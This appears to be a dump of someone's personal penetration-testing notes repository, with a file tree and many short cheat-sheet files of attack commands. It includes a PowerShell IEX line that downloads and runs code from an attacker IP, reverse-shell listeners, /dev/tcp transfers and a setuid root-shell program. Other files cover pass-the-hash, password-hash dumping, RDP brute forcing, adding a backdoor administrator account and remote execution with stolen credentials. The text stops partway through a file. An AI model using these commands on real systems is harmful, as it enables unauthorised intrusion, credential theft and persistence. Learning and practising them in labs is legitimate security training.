├── recon
    ├── snmpwalk.txt
    ├── webdav.txt
    ├── nikto.txt
    ├── enum4linux.txt
    ├── recon-ng.txt
    ├── nbtscan.txt
    ├── droopescan.txt
    ├── theharvester.txt
    ├── reconsteps.txt
    ├── masscan.txt
    ├── ncat.txt
    ├── openvas.txt
    ├── netstat.txt
    ├── usernames.txt
    ├── smtp_enum.txt
    ├── onesixtyone.txt
    ├── iis_shortname.txt
    ├── wpscan.txt
    ├── dns.txt
    ├── gobuster.txt
    ├── password_gathering.txt
    ├── wfuzz.txt
    ├── curl.txt
    └── nmap.txt
├── filetransfer
    ├── ftp_server.txt
    ├── dev_tcp.txt
    ├── http_server.txt
    ├── windows
    │   ├── webrequest.txt
    │   ├── tftp.txt
    │   ├── web_request.txt
    │   ├── wget.txt
    │   ├── winrm.txt
    │   └── vbs.txt
    ├── scp.txt
    ├── nc.txt
    ├── nginx_file_transfer.txt
    ├── ftp_commands.txt
    ├── smb.txt
    ├── nginx_setup.txt
    ├── base64.txt
    ├── rsync.txt
    └── smb_server.py
├── privesc
    ├── linux
    │   └── find-suid.txt
    └── windows
    │   ├── hashdump.txt
    │   ├── sherlock.txt
    │   └── unquoted-service-paths.txt
├── remote_connection
    ├── scp.txt
    ├── telnet.txt
    ├── pth-winexe.txt
    ├── ftp.txt
    ├── psExec.txt
    ├── ssh.txt
    ├── winrm.rb
    ├── winrm.txt
    ├── remote_desktop.txt
    ├── psRemoting.txt
    └── winrm_cert.rb
├── windows
    ├── llmnr.txt
    ├── powershell_language_mode.txt
    ├── download.txt
    ├── check_antivirus.txt
    ├── check_architecture.txt
    ├── rlwrap.txt
    ├── mssql.txt
    ├── create_account.txt
    ├── putty.txt
    ├── rdesktop.txt
    ├── runas.txt
    ├── file_permissions.txt
    ├── active_directory
    │   ├── getDomainController.txt
    │   ├── powerview.txt
    │   ├── kerberoasting.txt
    │   ├── asreproasting.txt
    │   ├── bloodhound.txt
    │   ├── group_policy_objects.txt
    │   ├── unconstrained_delegation.txt
    │   ├── rubeus.txt
    │   ├── writeDACL.txt
    │   ├── constrained_delegation.txt
    │   └── tickets.txt
    ├── check_services.txt
    ├── prompt_credentials.txt
    ├── get_os.txt
    ├── ads.txt
    ├── enable_rdp.txt
    ├── constrained_powershell_bypass.txt
    ├── reg_query.txt
    ├── base64.txt
    ├── pass_the_hash.txt
    ├── switch_user.txt
    ├── dpapi.txt
    └── crackmapexec.txt
├── scripts
    ├── setuid.c
    ├── ipScan.sh
    ├── split_binary.sh
    ├── printAllAscii.sh
    ├── portscan.sh
    ├── printAllAscii.py
    ├── subnetscan.ps1
    ├── subnetscan.sh
    ├── pingNetwork.sh
    ├── checkPort.py
    ├── assembly2shellcode.sh
    ├── pingNetwork.py
    ├── socketShell.py
    ├── iraw2png.pl
    ├── byte_order_converter.py
    ├── psMonitor.sh
    ├── zonetransfer.sh
    ├── smtpVrfyUsers.py
    ├── smbver.sh
    ├── decryptRSA.py
    ├── smtpVrfyUserList.py
    ├── convert_to_vbs.py
    ├── blind_sqli.py
    ├── blind_nosqli.py
    └── portscan.py
├── forensics
    ├── dit.txt
    ├── convert.txt
    ├── volatility.txt
    └── luks_encrypted.txt
├── smb
    ├── version.txt
    ├── smbmap.txt
    ├── smb_relay.txt
    ├── mount_shares.txt
    ├── setup.txt
    ├── smb_scf.txt
    ├── smbclient.txt
    └── rpcclient.txt
├── persistence
    ├── linux
    │   ├── techniques.txt
    │   └── ssh.txt
    └── windows
    │   ├── wmi.txt
    │   └── schtasks.txt
├── nfs
    ├── showmount.txt
    └── mountShares.txt
├── databases
    ├── sql
    │   ├── postgresqlCli.txt
    │   ├── oracle
    │   │   ├── oscanner.txt
    │   │   ├── tnscmd.txt
    │   │   ├── sqlplus.txt
    │   │   ├── cli.txt
    │   │   └── odat.txt
    │   ├── mssql
    │   │   ├── mssqlclient.txt
    │   │   ├── sqsh.txt
    │   │   └── mssql.txt
    │   ├── mysql.txt
    │   ├── blindSqli.txt
    │   ├── blindSqli.py
    │   ├── sqlmap.txt
    │   └── sqli.txt
    └── nosql
    │   └── mongo
    │       └── mongo.txt
├── README.md
├── bruteforce
    ├── pdfCrack.txt
    ├── fcrackzip.txt
    ├── rdp.txt
    ├── openssl.txt
    ├── patator.txt
    ├── password-spray.txt
    ├── generateWordlist.txt
    ├── padbusterCookie.txt
    ├── 7zCrack.sh
    ├── john.txt
    ├── hashcat.txt
    └── hydra.txt
├── networking
    ├── netdiscover.txt
    ├── route.txt
    ├── packets
    │   ├── icmpReadFile.txt
    │   ├── sniffPackets.py
    │   └── capturePackets.py
    ├── firewall.txt
    ├── tcpdump.txt
    ├── iptables.txt
    └── vm_bridge.txt
├── binary_exploitation
    ├── buffer_overflow
    │   ├── nasmShell.txt
    │   ├── patternCreate.txt
    │   ├── patternOffset.txt
    │   ├── windows
    │   │   └── slMail.txt
    │   ├── egg_hunting
    │   │   ├── info.txt
    │   │   └── bighead.py
    │   ├── linux
    │   │   ├── htbOctoberOverflow.py
    │   │   ├── htbNodeOverflow.py
    │   │   └── guide.txt
    │   ├── rop.txt
    │   ├── msfvenom.txt
    │   ├── immunityDbg.txt
    │   └── remote_overflow.txt
    └── reverse_engineering
    │   ├── ghidra.txt
    │   ├── radare2.txt
    │   ├── recon.txt
    │   └── gdb.txt
├── infrastructure
    ├── linux.txt
    └── windows.txt
├── pivoting
    ├── ncat.txt
    ├── windows
    │   ├── wmic.txt
    │   ├── netsh.txt
    │   └── plink.txt
    ├── portForwarding.txt
    ├── sshuttle.txt
    ├── socat.txt
    ├── meterpreter.txt
    ├── chisel.txt
    └── ssh.txt
├── post_exploitation
    └── windows
    │   ├── fgdump.txt
    │   ├── disable_monitoring.txt
    │   ├── schtasks.txt
    │   ├── mimikatz.txt
    │   └── com_hijack.txt
├── certificates
    ├── openssl.txt
    └── generateCA.txt
├── mail
    ├── imap
    │   └── imapCurl.txt
    ├── smtp
    │   └── smtp.txt
    └── sendemail.txt
├── file_inclusion
    ├── uploadFile.txt
    └── lfi.txt
├── google_dorks
    └── dorks.txt
├── port_knocking
    └── portKnock.txt
├── azure_ad
    ├── post_exploitation.txt
    ├── initial_access.txt
    ├── azurehound.txt
    └── recon.txt
├── restricted_shell
    └── methods.txt
├── tokens
    └── jwt.txt
├── development
    ├── cross-compile.txt
    └── nasm.txt
├── package_injection
    └── package_injection.txt
├── git
    └── git.txt
├── reverse_shell
    ├── msfvenom.txt
    └── interactive_shell.txt
├── ldap
    ├── recon.txt
    └── blind_ldap_injection.txt
├── metasploit
    └── metasploit.txt
└── defense_evasion
    └── amsi
        ├── AmsiInitFailed.ps1
        ├── OverwriteAmsiContext.ps1
        └── AmsiPatchInMemory.ps1


/recon/snmpwalk.txt:
--------------------------------------------------------------------------------
1 | snmpwalk -c public -v2c 10.10.10.92
2 | 


--------------------------------------------------------------------------------
/filetransfer/ftp_server.txt:
--------------------------------------------------------------------------------
1 | sudo python -m pyftpdlib -p 21
2 | 


--------------------------------------------------------------------------------
/privesc/linux/find-suid.txt:
--------------------------------------------------------------------------------
1 | find / -user root -perm -4000 -print 2>/dev/null
2 | 


--------------------------------------------------------------------------------
/remote_connection/scp.txt:
--------------------------------------------------------------------------------
1 | scp {me}@{them}:/home/{user}/packets.pcap packets.pcap
2 | 


--------------------------------------------------------------------------------
/windows/llmnr.txt:
--------------------------------------------------------------------------------
1 | Check if LLMNR is enabled:
2 |     example: gpresult /Scope Computer /v
3 | 


--------------------------------------------------------------------------------
/scripts/setuid.c:
--------------------------------------------------------------------------------
1 | int main(void) {
2 | 	setgid(0);
3 | 	setuid(0);
4 | 	system("/bin/bash");
5 | }
6 | 


--------------------------------------------------------------------------------
/remote_connection/telnet.txt:
--------------------------------------------------------------------------------
1 | Connect to a machine via telnet:
2 | 
3 | Step 1(host): telnet -l <user> <targetIp>
4 | 


--------------------------------------------------------------------------------
/windows/powershell_language_mode.txt:
--------------------------------------------------------------------------------
1 | Check powershell's language mode:
2 |     $ExecutionContext.SessionState.LanguageMode
3 | 


--------------------------------------------------------------------------------
/forensics/dit.txt:
--------------------------------------------------------------------------------
1 | When you have a .dit file, follow this guide: https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/
2 | 


--------------------------------------------------------------------------------
/windows/download.txt:
--------------------------------------------------------------------------------
1 | powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.15:8000/exploit.html')"                    
2 | 


--------------------------------------------------------------------------------
/recon/webdav.txt:
--------------------------------------------------------------------------------
1 | Recon usages of webdav on a website:
2 | 
3 | syntax : davtest -url <targetURL>
4 | example: davtest -url http://10.192.23.41
5 | 


--------------------------------------------------------------------------------
/recon/nikto.txt:
--------------------------------------------------------------------------------
1 | Scan a host for web vulnerabilities
2 | 
3 | syntax : nikto -host http://<targetIP>:<port>
4 | example: nikto -host http://10.12.14.44:80
5 | 


--------------------------------------------------------------------------------
/scripts/ipScan.sh:
--------------------------------------------------------------------------------
1 | network='10.11.1'
2 | 
3 | for ip in $(seq 1 5) 
4 | do
5 | 	ping -c 1 $network.$ip > /dev/null && echo "Online: $network.$ip"
6 | done
7 | 


--------------------------------------------------------------------------------
/smb/version.txt:
--------------------------------------------------------------------------------
1 | Find version of samba via following ways:
2 | 
3 | 	syntax : smbclient --list=<targetIP>
4 | 	example: smbclient --list=10.10.10.10
5 | 
6 | 


--------------------------------------------------------------------------------
/persistence/linux/techniques.txt:
--------------------------------------------------------------------------------
1 | Check out this page for a few techniques:
2 |     https://medium.com/@airman604/9-ways-to-backdoor-a-linux-box-f5f83bae5a3c
3 | 


--------------------------------------------------------------------------------
/scripts/split_binary.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # split a binary into 2 bytes separated with a - (e.g. ae-2f-ff-00-aa-10...)
3 | xxd -ps $1 | sed 's/.\{2\}/&-/g' > $2
4 | 


--------------------------------------------------------------------------------
/persistence/windows/wmi.txt:
--------------------------------------------------------------------------------
1 | Use WMI as a LOCAL ADMINISTRATOR to get persistence on a compromised host.
2 | 
3 | Powerlurk (https://github.com/Sw4mpf0x/PowerLurk)
4 | 


--------------------------------------------------------------------------------
/scripts/printAllAscii.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | # Simple oneliner to print all ascii characters
4 | for ((i=32;i<127;i++)) do printf "\\$(printf %03o "$i")\n"; done
5 | 


--------------------------------------------------------------------------------
/scripts/portscan.sh:
--------------------------------------------------------------------------------
1 | host=$1
2 | 
3 | for port in $(seq 1 65535)
4 | do
5 | 	(echo something > /dev/tcp/$host/$port && echo "Port $port is open") 2> /dev/null
6 | done
7 | 


--------------------------------------------------------------------------------
/scripts/printAllAscii.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | 
3 | # Simple python script to print all ascii characters
4 | 
5 | for i in range(0, 127):
6 |     print(chr(i))
7 | ###
8 | 


--------------------------------------------------------------------------------
/recon/enum4linux.txt:
--------------------------------------------------------------------------------
1 | enum4linux is a tool which runs multiple scripts to scan a target
2 | 
3 | 	syntax : enum4linux -v <targetIP>
4 | 	example: enum4linux -v 132.4.23.44
5 | 


--------------------------------------------------------------------------------
/recon/recon-ng.txt:
--------------------------------------------------------------------------------
1 | See if your email has been dumped:
2 | 
3 | Step 1: recon-ng
4 | Step 2: use recon/contacts-credentials/hibp_breach
5 | Step 3: set SOURCE <email@hotmail.com>
6 | 


--------------------------------------------------------------------------------
/nfs/showmount.txt:
--------------------------------------------------------------------------------
1 | Use showmount to see which shares are available on nfs(apt-get install nfs-common):
2 | 
3 | 	syntax : showmount -e <targetIP>
4 | 	example: showmount -e 10.10.15.43
5 | 


--------------------------------------------------------------------------------
/recon/nbtscan.txt:
--------------------------------------------------------------------------------
1 | nbtscan is a NETBIOS nameserver scanner
2 | 
3 | 
4 | Scan a network range:
5 | 
6 | 	syntax : nbtscan <subnet>.<startIP>-<endIP>
7 | 	example: nbtscan 10.12.31.2-254
8 | 


--------------------------------------------------------------------------------
/databases/sql/postgresqlCli.txt:
--------------------------------------------------------------------------------
1 | Use PostgreSql from command line:
2 | 
3 | 	syntax : psql -h <ip> -d <database> -U <user> -W
4 | 	example: psql -h localhost -d clients -U tyrone -W
5 | 
6 | 


--------------------------------------------------------------------------------
/windows/check_antivirus.txt:
--------------------------------------------------------------------------------
1 | Check which Antivirus is installed locally
2 | 
3 |     example: wmic /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
4 | 


--------------------------------------------------------------------------------
/scripts/subnetscan.ps1:
--------------------------------------------------------------------------------
1 | for ($x = 1; $x -le 254; $x++) {
2 |     for ($y = 0; $y -le 254; $y++) {
3 |         Test-Connection -ComputerName "10.9.$x.$y" -Count 1 -ErrorAction SilentlyContinue
4 |     }
5 | }
6 | 


--------------------------------------------------------------------------------
/databases/sql/oracle/oscanner.txt:
--------------------------------------------------------------------------------
1 | oscanner is used to enumerate SID (Service Identifier), which is the database name
2 | 
3 | 	syntax : oscanner -s <targetIP> -P <port>
4 | 	example: oscanner -s 10.15.10.82 -P 1521
5 | 


--------------------------------------------------------------------------------
/recon/droopescan.txt:
--------------------------------------------------------------------------------
1 | Droopescan on a Drupal-powered website (https://github.com/droope/droopescan):
2 | 
3 | 	syntax : ./droopescan scan drupal -u 10.12.24.54
4 | 	example: ./droopescan scan drupal -u <targetIP>
5 | 


--------------------------------------------------------------------------------
/windows/check_architecture.txt:
--------------------------------------------------------------------------------
1 | Check the architecture of the windows box in powershell:
2 | 
3 | 	example: systeminfo
4 | 	example: [environment]::Is64BitOperatingSystem
5 | 	example: [environment]::Is64BitProcess
6 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Here are all my personal notes I made during my pentest learning experience since the very beginning.
2 | =====================================================================================================
3 | 


--------------------------------------------------------------------------------
/nfs/mountShares.txt:
--------------------------------------------------------------------------------
1 | Mount nfs shares on your local machine:
2 | 
3 | 	Step 1: Make a directory somewhere (<directory>)
4 | 	Step 2: mount -t nfs <targetIP>:<share> <directory>	# mount -t nfs 10.10.13.35:/home /tmp/homeCopy
5 | 


--------------------------------------------------------------------------------
/windows/rlwrap.txt:
--------------------------------------------------------------------------------
1 | Get a shell that can do commands like 'up', 'down', 'left', 'right'... on a windows box:
2 | 
3 | 	Step 1: apt-get install rlwrap
4 | 	Step 2: rlwrap nc -lvnp 443
5 | 	Step 3: Get reverse shell connection
6 | 


--------------------------------------------------------------------------------
/bruteforce/pdfCrack.txt:
--------------------------------------------------------------------------------
1 | pdfcrack is a tool made for cracking password-protected PDF files:
2 | 
3 | 	syntax : pdfcrack -f '<file>.pdf' -w <dictionary>
4 | 	example: pdfcrack -f 'creditcards.pdf' -w /usr/share/wordlists/rockyou.txt
5 | 


--------------------------------------------------------------------------------
/recon/theharvester.txt:
--------------------------------------------------------------------------------
1 | Find email-addresses used on a certain site:
2 | 
3 | 	syntax : theharvester -d <targetSite> -b <searchEngine>
4 | 	example: theharvester -d cisco.com -b google
5 | 	example: theharvester -d cisco.com -b all
6 | 


--------------------------------------------------------------------------------
/bruteforce/fcrackzip.txt:
--------------------------------------------------------------------------------
1 | fcrackzip is a tool made for cracking password-protected ZIP files:
2 | 
3 | 	syntax : fcrackzip -u -D -p <dictionary> <file>.zip
4 | 	example: fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt suspicious.zip
5 | 


--------------------------------------------------------------------------------
/filetransfer/dev_tcp.txt:
--------------------------------------------------------------------------------
1 | Example with a limited shell
2 | 
3 | Step 1(host)  : nc -lvnp <port> < file.Txt
4 | Step 2(target): bash -c "cat < /dev/tcp/<hostIP>/<port> > ./file.txt"
5 | 
6 | Don't use 'bash -c' if you have a working bash shell.
7 | 


--------------------------------------------------------------------------------
/windows/mssql.txt:
--------------------------------------------------------------------------------
1 | Use PowerUpSQL to enumerate and abuse MSSQL instances in the network (https://github.com/NetSPI/PowerUpSQL).
2 | Find the related commands in the cheatsheet: https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet
3 | 


--------------------------------------------------------------------------------
/databases/sql/oracle/tnscmd.txt:
--------------------------------------------------------------------------------
1 | Use tnscmd to perform certain commands on an oracle listener (default port 1521)
2 | 
3 | 	syntax : tnscmd10g <cmd> -h <targetIP>
4 | 	example: tnscmd10g status -h 10.12.32.41	# Error probably means it's password protected
5 | 


--------------------------------------------------------------------------------
/windows/create_account.txt:
--------------------------------------------------------------------------------
1 | In windows command shell, do following steps to create an account with administrator privileges:
2 | 
3 | 	Step 1(victim): net user /add <username> <password>
4 | 	Step 2(victim): net localgroup administrators <username> /add
5 | 


--------------------------------------------------------------------------------
/networking/netdiscover.txt:
--------------------------------------------------------------------------------
1 | Use netdiscover to find hosts on an internal network:
2 | 
3 | 	syntax : netdiscover -r <targetIP>/<subnet>
4 | 	example: netdiscover -r 192.168.45.0/24
5 | 
6 | 	syntax : netdiscover -i <interface>
7 | 	example: netdiscover -i eth0
8 | 


--------------------------------------------------------------------------------
/recon/reconsteps.txt:
--------------------------------------------------------------------------------
1 | My steps for starting port enumeration on a box:
2 | 
3 | 	# Warning: these scans are very loud
4 | 	TCP: nmap -sC -sV -Pn -p- --min-rate 2000 -oN <outFile>.nmap <targetIP>
5 | 	UDP: nmap -sU --top-ports 10000 --min-rate 2000 <targetIP>
6 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/nasmShell.txt:
--------------------------------------------------------------------------------
1 | Use nasm_shell to find the opcode equivalent to 'JMP ESP':
2 | 
3 | 	Step 1: /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
4 | 	Step 2: Type in the instruction and grab the opcode (jmp esp -> FFE4)
5 | 


--------------------------------------------------------------------------------
/infrastructure/linux.txt:
--------------------------------------------------------------------------------
 1 | All kinds of useful default infrastructure for Linux:
 2 | 
 3 | 	Custom installed programs: /opt /usr/local/bin /usr/local/sbin
 4 | 	Log files		 : /var/log
 5 | 
 6 | 	Default web directories:
 7 | 		
 8 | 		web: /var/www /var/www/html
 9 | 		
10 | 


--------------------------------------------------------------------------------
/pivoting/ncat.txt:
--------------------------------------------------------------------------------
1 | Tunneling with netcat:
2 | 
3 | Step 1(victim): sudo /usr/bin/ncat -l <lport> --sh-exec "ncat <targetIP> 987 -p 53" &
4 | Step 2(victim): ssh -p <lport> <user>@localhost
5 | 
6 | Example: sudo /usr/bin/ncat -l 1234 --sh-exec "ncat 192.168.5.2 987 -p 53" &
7 | 


--------------------------------------------------------------------------------
/recon/masscan.txt:
--------------------------------------------------------------------------------
1 | masscan to scan all tcp/udp ports on a host:
2 | 
3 | syntax : sudo masscan -e <interface> -p<portRange min-max>, <protocol>:<portRange min-max> --max-rate <rate> <targetIP>
4 | example: sudo masscan -e tun0 -p0-65535,U:0-65535 --max-rate 500 10.12.14.54
5 | 


--------------------------------------------------------------------------------
/scripts/subnetscan.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | for i in $(seq 254)
 4 | do 
 5 |     for j in $(seq 254)
 6 |     do
 7 |         ping 192.168.$i.$j -c1 -W1 &    # '&' backgrounds and makes a new process everytime, so it's pretty loud
 8 |     done
 9 | done | grep from
10 | 


--------------------------------------------------------------------------------
/post_exploitation/windows/fgdump.txt:
--------------------------------------------------------------------------------
1 | Fgdump.exe is a binary for windows that can be used to dump account hashes on a fully compromised windows machine.
2 | 
3 | usage:
4 | 	Step 1(attacker): Get the 'fgdump.exe' binary to the compromised windows machine
5 | 	Step 2(victim)	: ./fgdump.exe
6 | 


--------------------------------------------------------------------------------
/recon/ncat.txt:
--------------------------------------------------------------------------------
 1 | Connect to a host:
 2 | 	syntax : nc <targetIP> <port>
 3 | 	example: nc 10.12.15.43 4444 < file.txt
 4 | 	ipv6   : nc -6 <targetIPv6> <port>
 5 | 
 6 | Listen on a specific port:
 7 | 	syntax : nc -lvnp <port>
 8 | 	example: nc -lvnp 4444
 9 | 	ipv6   : nc -6 -lvnp 9000
10 | 


--------------------------------------------------------------------------------
/databases/sql/mssql/mssqlclient.txt:
--------------------------------------------------------------------------------
1 | Connect to a remote mssql instance using Impacket's mssqclclient:
2 | 
3 | 	syntax : python mssqlclient.py '<username>:<password>'@<targetIP> 
4 | 	example: python /opt/Impacket/examples/mssqlclient.py 'Administrator:L0cal4dm1N'@10.15.15.15 -windows-auth
5 | 


--------------------------------------------------------------------------------
/databases/sql/oracle/sqlplus.txt:
--------------------------------------------------------------------------------
1 | Use sqlplus to connect to an Oracle DB instance:
2 | 
3 | 	syntax : sqlplus <user>/<pass>@<targetIP>:<port>/<SID>
4 | 	example: sqlplus sc0tt/p4ssw0rd@45.13.14.82:1521/CLIENTS
5 | 	example: sqlplus sc0tt/p4ssw0rd@45.13.14.82:1521/CLIENTS as sysdba	# Kinda like sudo
6 | 


--------------------------------------------------------------------------------
/windows/putty.txt:
--------------------------------------------------------------------------------
1 | Generate a .ppk private key for remote connection to ssh from Windows:
2 | 	
3 | 	# apt-get install putty-tools
4 | 	syntax : puttygen -t <encryption> -b <size> -C "<attacker>@<attackerIP>" -o <key>.ppk
5 | 	example: puttygen -t rsa -b 2048 -C "root@192.168.0.123" -o keyfile.ppk
6 | 


--------------------------------------------------------------------------------
/remote_connection/pth-winexe.txt:
--------------------------------------------------------------------------------
1 | Use pth-winexe to pass the hash and get shell connection on a windows box
2 | 
3 | 	syntax : pth-winexe -U <user>%<NTLM-hash> //<targetIP> <command>
4 | 	example: pth-winexe -U Administrator%aad3b435b51404eeabd3b435b51404er:9e73037557cbcebf74ae46481e07b0c7 //13.14.14.82 cmd
5 | 


--------------------------------------------------------------------------------
/scripts/pingNetwork.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [ "$1" == "" ]
 4 | then
 5 | 	echo "Usage  : ./pingNetwork.sh <network>"
 6 | 	echo "Example: ./pingNetwork.sh 10.10.10"
 7 | else
 8 | 	for i in `seq 1 254`; do 
 9 | 		ping -c 1 $1.$i | grep "64 bytes" | cut -d " " -f 4 | sed 's/.$//'
10 | 	done
11 | fi
12 | 


--------------------------------------------------------------------------------
/filetransfer/http_server.txt:
--------------------------------------------------------------------------------
1 | Transfer files if python is on the box:
2 | 
3 | Step 1(host)  : python -m SimpleHTTPServer <port> / python3 http.server <port>
4 | Step 2(target): curl <targetIP>:<port>/file > file
5 | 
6 | Alternate step 2(host): wget http://<targetIP>:<port>/filename	# Go into /tmp if permission denied
7 | 


--------------------------------------------------------------------------------
/forensics/convert.txt:
--------------------------------------------------------------------------------
1 | Convert a raw screen dump to a png file:
2 | 
3 | 	Step 1(victim)	: cat /sys/class/graphics/fb0/virtual_size		# get virtual size dimensions of data (1176, 885 in this case)
4 | 	Step 2(attacker): ./iraw2png.pl 1176 885 < screen.raw > screen.png	# check 'Scripts' folder for the perl script
5 | 
6 | 


--------------------------------------------------------------------------------
/windows/rdesktop.txt:
--------------------------------------------------------------------------------
1 | Connect to a Windows machine with a GUI display of the screen via rdesktop:
2 | 
3 | 	syntax : rdesktop <targetIP> -u <user> -p <password> -g <geometry>	# Geometry allows you to make the GUI window not fully cover your screen
4 | 	example: rdesktop 10.12.32.43 -u administrator -p 'F0restK33p3r!' -g 90%
5 | 


--------------------------------------------------------------------------------
/filetransfer/windows/webrequest.txt:
--------------------------------------------------------------------------------
1 | Download a file from victim to attacker host via powershell webrequest:
2 | 
3 | Step 1(host)  : python -m SimpleHTTPServer
4 | Step 2(target): $url = "http://<hostIP>:<port>/<file>"
5 | Step 3(target): $output = "<outFile>"
6 | Step 3(target): Invoke-WebRequest -Uri $url -OutFile $output
7 | 


--------------------------------------------------------------------------------
/privesc/windows/hashdump.txt:
--------------------------------------------------------------------------------
1 | Dump password hashes when you have a windows filesystem mounted on linux:
2 | 
3 | 	Step 1(attacker): Navigate to the right directory (/mnt/vhd/Windows/System32/config)
4 | 	Step 2(attacker): 
5 | 
6 | 		syntax : samdump2 SYSTEM SAM > <outFile>
7 | 		example: samdump2 SYSTEM SAM > /tmp/hashes.txt
8 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/patternCreate.txt:
--------------------------------------------------------------------------------
1 | Create a unique string buffer so we can see at what exact buffer length the target program crashes:
2 | 	
3 | 	syntax : /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <bufferSize>
4 | 	example: /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1500
5 | 


--------------------------------------------------------------------------------
/scripts/checkPort.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | 
 3 | ip = input("Please enter an IP address: ")
 4 | port = input("Please enter a port number: ")
 5 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 6 | 
 7 | if sock.connect_ex((ip, int(port))):
 8 | 	print(f"Port {port} is closed!")
 9 | else:
10 | 	print(f"Port {port} is open!")
11 | ##


--------------------------------------------------------------------------------
/bruteforce/rdp.txt:
--------------------------------------------------------------------------------
1 | Use ncrack to bruteforce remote desktop credentials:
2 | 
3 | 	# -f: stop after 1 found credential, ',CL=1' = one connection at a time
4 | 
5 | 	syntax : ncrack -v -f --user <user> -P <passList> rdp://<targetIP>,CL=1
6 | 	example: ncrack -v -f --user administrator -P /usr/share/wordlist/rockyou.txt rdp://10.132.12.3,CL=1
7 | 


--------------------------------------------------------------------------------
/recon/openvas.txt:
--------------------------------------------------------------------------------
1 | Openvas is an open-source vulnerability scanner which is capable of scanning for multiple vulnerabilities (runs on port 9392)
2 | 
3 | 	Step 1: apt-get install openvas
4 | 	Step 2: openvas-setup (set password, log in as admin)
5 | 	Step 3: openvas-start
6 | 	Step 4: go to localhost:9392 and log in with admin + creds
7 | 	
8 | 


--------------------------------------------------------------------------------
/scripts/assembly2shellcode.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | if [ "$1" == "" ]
 4 | then
 5 |     echo "Usage  : $0 <bin>"
 6 |     echo "Example: $0 ./shellcode.exe"
 7 | else
 8 |     # Convert disassembly to shellcode
 9 |     for i in $(objdump -d -M intel $1 | grep "^ " | cut -f 2)
10 |     do
11 |         echo -n '\x'$i
12 |     done
13 | fi
14 | 


--------------------------------------------------------------------------------
/bruteforce/openssl.txt:
--------------------------------------------------------------------------------
1 | 'bruteforce-salted-openssl' is a bruteforcing tool to crack openssl encrypted plaintext.
2 | 
3 | 
4 | syntax : bruteforce-salted-openssl -t <threads> -f <dictionary> -c <cipher> -d <digest> <encryptedFile>
5 | example: bruteforce-salted-openssl -t 15 -f /usr/share/wordlists/rockyou.txt -c aes-256-cbc -d sha256 pass_enc.txt
6 | 


--------------------------------------------------------------------------------
/certificates/openssl.txt:
--------------------------------------------------------------------------------
1 | Openssl is a tool for various cryptography functions
2 | 
3 | 
4 | Use openssl to convert a cert and key to a PKCS12 file:
5 | 
6 | 	syntax : openssl pkcs12 -export -out <outFile>.p12 -in <certificate> -inkey <privateKey>
7 | 	example: openssl pkcs12 -export -out capsule_corp.p12 -in capsule.cert.pem -inkey capsule.key.pem 
8 | 


--------------------------------------------------------------------------------
/recon/netstat.txt:
--------------------------------------------------------------------------------
 1 | Check which ports are open/listening on the local machine:
 2 | 
 3 | 	Linux: 
 4 | 		syntax : netstat -alnp | grep -i list | grep <port>
 5 | 		example: netstat -alnp | grep -i list | grep 80
 6 | 
 7 | 	Windows:
 8 | 		syntax : netstat -ato | findstr -i list | findstr <port>
 9 | 		example: netstat -ato | findstr -i list | findstr 8080
10 | 


--------------------------------------------------------------------------------
/binary_exploitation/buffer_overflow/patternOffset.txt:
--------------------------------------------------------------------------------
1 | Crash the target application with the 'pattern_create' pattern, then copy the value at the EIP register to get the exact offset:
2 | 
3 | 	syntax : /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <shellcode>
4 | 	example: /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41414244
5 | 


--------------------------------------------------------------------------------
/networking/route.txt:
--------------------------------------------------------------------------------
 1 | Add or delete routes (Linux):
 2 | 
 3 | Step 1: check routes with 'route'
 4 | 
 5 | Add:
 6 | 	syntax:  route add -net <IP>/<subnet> gw <IP> <interface>
 7 | 	example: route add -net 192.168.5.0/24 gw * ens3
 8 | Delete:
 9 | 	syntax:  route del -net <IP>/<subnet> gw <IP> <interface>
10 | 	exmaple: route del -net 192.168.5.0/24 gw 0.0.0.0 ens3
11 | 


--------------------------------------------------------------------------------
/pivoting/windows/wmic.txt:
--------------------------------------------------------------------------------
1 | Use wmic to execute code on another computer within the network with found credentials:
2 | 	syntax : wmic /nide:"<hostname>" /user:"<domain>\<user>" /password:"<password>" process call create "<cmd>"
3 | 	example: wmic /node:"ws-1010" /user:"allsafe.com\e.alderson" /password:"MyP@ssw0rD!" process call create "powershell -enc [...snip...]"
4 | 
5 | 


--------------------------------------------------------------------------------
/remote_connection/ftp.txt:
--------------------------------------------------------------------------------
 1 | Connect to a machine via ftp (default port 21):
 2 | 	
 3 | 	syntax : ftp <targetIP>
 4 | 	example: ftp 10.12.32.3
 5 | 
 6 | 
 7 | Download all directories accessible via an ftp user (do this on host box):
 8 | 
 9 | 	syntax : wget --mirror 'ftp://<user>:<password>@<targetIP>'
10 | 	example: wget --mirror 'ftp://tyrone:P@s5w0rD!@10.10.12.23'
11 | 
12 | 


--------------------------------------------------------------------------------
/privesc/windows/sherlock.txt:
--------------------------------------------------------------------------------
1 | https://github.com/rasta-mouse/Sherlock
2 | 
3 | Sherlock is an enumeration script that checks the Windows system for unpatched privilege escalation vulnerabilities.
4 | Step 1: Get the script to the victim Windows machine
5 | Step 2: 'Import-Module .\Sherlock.ps1'.
6 | Step 3: Choose which function you want to do (Find-AllVulns to check for all vulnerabilities)
7 | 


--------------------------------------------------------------------------------
/scripts/pingNetwork.py:
